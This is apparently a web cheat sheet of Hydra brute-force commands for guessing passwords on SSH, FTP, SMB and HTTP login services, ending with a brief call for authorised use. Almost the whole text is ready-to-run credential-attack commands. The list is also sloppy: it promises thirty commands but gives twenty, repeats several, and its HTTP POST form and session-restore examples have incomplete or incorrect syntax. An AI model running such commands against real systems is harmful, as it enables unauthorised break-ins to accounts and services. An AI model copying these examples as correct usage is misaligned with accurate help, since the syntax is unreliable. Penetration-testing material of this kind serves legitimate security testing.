Hydra is a powerful and fast password-cracking tool used for brute-force attacks on various protocols. It supports multiple attack strategies, making it a popular tool among cybersecurity professionals and penetration testers.
Below are the top 30 Hydra commands, explaining their functionality and usage.
- Brute-Force SSH Login Using a Password List
- Brute-Force SSH on a Non-Standard Port
- Brute-Force HTTP GET Authentication
- Brute-Force HTTP POST Login Form
- Brute-Force SSH with Multiple Usernames
- Brute-Force SMB Authentication
- Brute-Force FTP Login
- Brute-Force SSH Login Using Hydra
- Brute-Force HTTP GET Login Form
- Brute-Force HTTP POST Login Form
- Brute-Force SSH with Null/Single/Reverse Password Guesses
- Set Parallel Connections to 4 for SSH Brute-Forcing
- Brute-Force HTTP GET Login with Multiple Usernames
- Brute-Force HTTP POST Login with Multiple Usernames
- Stop After First Found Password for SSH
- Brute-Force FTP Login on Port 21
- Save Results to a File
- Verbose Mode to Show Each Attempt
- Brute-Force SSH on Multiple Targets Listed in a File
- Restore a Previous Session
1. Brute-Force SSH Login Using a Password List
hydra -l admin -P /path/to/passwords.txt 192.168.1.1 sshAttempts SSH login with the username admin using the provided password list.
2. Brute-Force SSH on a Non-Standard Port
hydra -l admin -P /path/to/passwords.txt -s 2222 ssh://192.168.1.1Tries SSH authentication on port 2222 instead of the default 22.
3. Brute-Force HTTP GET Authentication
hydra -l admin -P /path/to/passwords.txt http-get://192.168.1.1Targets a basic HTTP GET authentication.
4. Brute-Force HTTP POST Login Form
hydra -l admin -P /path/to/passwords.txt http-post-form://192.168.1.1/login.phpAttempts to crack login credentials on a website’s login page.
5. Brute-Force SSH with Multiple Usernames
hydra -L users.txt -P passwords.txt 192.168.1.1 sshUses a list of usernames and passwords to attempt SSH login.
6. Brute-Force SMB Authentication
hydra -L users.txt -P passwords.txt smb://192.168.1.1Tries to authenticate against an SMB (Server Message Block) service.
7. Brute-Force FTP Login
hydra -l admin -P /path/to/passwords.txt ftp://192.168.1.1Targets FTP login credentials.
8. Brute-Force SSH Login Using Hydra
hydra -l admin -P /path/to/passwords.txt 192.168.1.1 sshRepeats SSH brute-force attack with Hydra.
9. Brute-Force HTTP GET Login Form
hydra -l admin -P /path/to/passwords.txt http-get://192.168.1.1/login.phpCracks HTTP authentication login forms.
10. Brute-Force HTTP POST Login Form
hydra -l admin -P /path/to/passwords.txt http-post-form://192.168.1.1/login.phpPerforms brute-force attacks on HTTP POST-based login forms.
11. Brute-Force SSH with Null/Single/Reverse Password Guesses
hydra -l admin -P /path/to/passwords.txt -e nsr 192.168.1.1 sshIncludes null, single, and reverse password attempts.
12. Set Parallel Connections to 4 for SSH Brute-Forcing
hydra -l admin -P /path/to/passwords.txt -t 4 192.168.1.1 sshLimits Hydra to 4 concurrent connections.
13. Brute-Force HTTP GET Login with Multiple Usernames
hydra -L users.txt -P passwords.txt http-get://192.168.1.1Tries HTTP GET authentication with a list of usernames.
14. Brute-Force HTTP POST Login with Multiple Usernames
hydra -L users.txt -P passwords.txt http-post-form://192.168.1.1/login.phpPerforms brute-force attacks on HTTP POST authentication using multiple usernames.
15. Stop After First Found Password for SSH
hydra -l admin -P /path/to/passwords.txt -f 192.168.1.1 sshStops once the first valid password is found.
16. Brute-Force FTP Login on Port 21
hydra -l admin -P /path/to/passwords.txt -s 21 192.168.1.1 ftpAttempts FTP login on the default port 21.
17. Save Results to a File
hydra -L users.txt -P passwords.txt -o results.txt 192.168.1.1 sshStores brute-force results in results.txt.
18. Verbose Mode to Show Each Attempt
hydra -l admin -P /path/to/passwords.txt -V 192.168.1.1 sshEnables verbose mode to display each login attempt.
19. Brute-Force SSH on Multiple Targets Listed in a File
hydra -l admin -P /path/to/passwords.txt -M targets.txt sshTargets multiple IP addresses specified in targets.txt.
20. Restore a Previous Session
hydra -l admin -P /path/to/passwords.txt -RResumes an interrupted brute-force session.
Final Thoughts
Hydra is an essential tool in penetration testing, but it should be used responsibly and only for ethical hacking purposes. Unauthorized usage of brute-force attacks is illegal. Always obtain permission before testing security on any system.
